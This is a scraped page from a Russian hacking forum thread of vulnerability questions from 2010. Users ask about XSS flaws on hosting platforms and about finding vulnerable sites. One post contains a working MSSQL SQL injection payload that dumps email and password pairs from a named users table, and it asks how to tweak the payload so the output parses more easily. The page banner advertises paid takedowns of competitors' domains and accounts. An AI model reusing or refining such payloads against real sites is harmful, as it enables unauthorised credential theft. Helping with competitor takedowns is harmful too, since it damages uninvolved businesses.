Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1093 из 2422

1093

Опции темы

Поиск в этой теме

Опции просмотра

07.01.2010, 16:07

jecka3000

Постоянный

Регистрация: 15.03.2008

Сообщений: 441

Провел на форуме:
2052341

Репутация: 95

Root-access, ясно, то есть ничего полезного из этого не сделаешь?

07.01.2010, 16:11

Root-access

Участник форума

Регистрация: 18.06.2008

Сообщений: 222

Провел на форуме:
2223440

Репутация: 648

Цитата:

Сообщение от jecka3000

Root-access, ясно, то есть ничего полезного из этого не сделаешь?

Ну хз, разве что если в этом скрипте есть инъекция или хсс.

07.01.2010, 16:24

Paul_Eckman

Участник форума

Регистрация: 10.11.2009

Сообщений: 122

Провел на форуме:
1245844

Репутация: 199

По вашему опыту: хсс-уязвимости могут быть на сайтах на базе ucoz.ru, at.ua, yandex.ru и т.п.?

07.01.2010, 16:26

wildshaman

Постоянный

Регистрация: 16.04.2008

Сообщений: 889

Провел на форуме:
12942062

Репутация: 1550

Цитата:

Сообщение от Paul_Eckman

По вашему опыту: хсс-уязвимости могут быть на сайтах на базе ucoz.ru, at.ua, yandex.ru и т.п.?

Были\есть на всех вышеуказанных сервисах.

07.01.2010, 16:28

Paul_Eckman

Участник форума

Регистрация: 10.11.2009

Сообщений: 122

Провел на форуме:
1245844

Репутация: 199

Спасибо! Обнаруживаются только с помощью сканеров или вручную тоже можно?

07.01.2010, 16:29

wildshaman

Постоянный

Регистрация: 16.04.2008

Сообщений: 889

Провел на форуме:
12942062

Репутация: 1550

Цитата:

Сообщение от Paul_Eckman

Спасибо! Обнаруживаются только с помощью сканеров или вручную тоже можно?

Только вручную, о каких сканерах может в таких сулчаях ерчь идти вообще оО

07.01.2010, 16:33

Paul_Eckman

Участник форума

Регистрация: 10.11.2009

Сообщений: 122

Провел на форуме:
1245844

Репутация: 199

Не знаю) Я в этом деле пока ламер.

Несколько штук обнаруживала вручную, но говорят, что со сканерами эффективнее.

07.01.2010, 16:37

wildshaman

Постоянный

Регистрация: 16.04.2008

Сообщений: 889

Провел на форуме:
12942062

Репутация: 1550

Сканеры для лолов

07.01.2010, 21:38

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

Провел на форуме:
556476

Репутация: 66

вопрос по скулю:

Цитата:

+and+(select+top+1+isnull(cast([email]+as+nvarchar(4000)),char(32))%2bchar(94)%2bisnull( cast([password]+as+nvarchar(4000)),char(32))+from+[jackson]..[users]+where+email+not+in+(select+top+1+email+from+[jackson]..[users]+where+1=1+order+by+[email])+)%3E0--

тут выводится в ответе email@domain.com^passmy
Возможно ли сделать запрос чтобы выдавало не email@domain.com^passmy
а !!!email@domain.com^passmy!!!
Тоесть надо добавит 0x212121 в начало и конец каждого ответа
это чтоб со страницы корректно спарсит нужно

#10

07.01.2010, 21:48

Gidz

Познающий

Регистрация: 10.08.2009

Сообщений: 30

Провел на форуме:
282022

Репутация: 4

Народ, прошу не пинать сильно, только сегодня начал разбираться, читаю сейчас про sql инъекции, не совсем понятно, как находить подходящие(уязвимые) сайты. Тоесть например нужно ли искать по какому-то определенному запросу в поисковике или какой-то есть софт подходящий для этого? Хотел бы попробовать поэкспериментировать, но блин не могу ничего подходящего найти.

Страница 1093 из 2422

1093

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules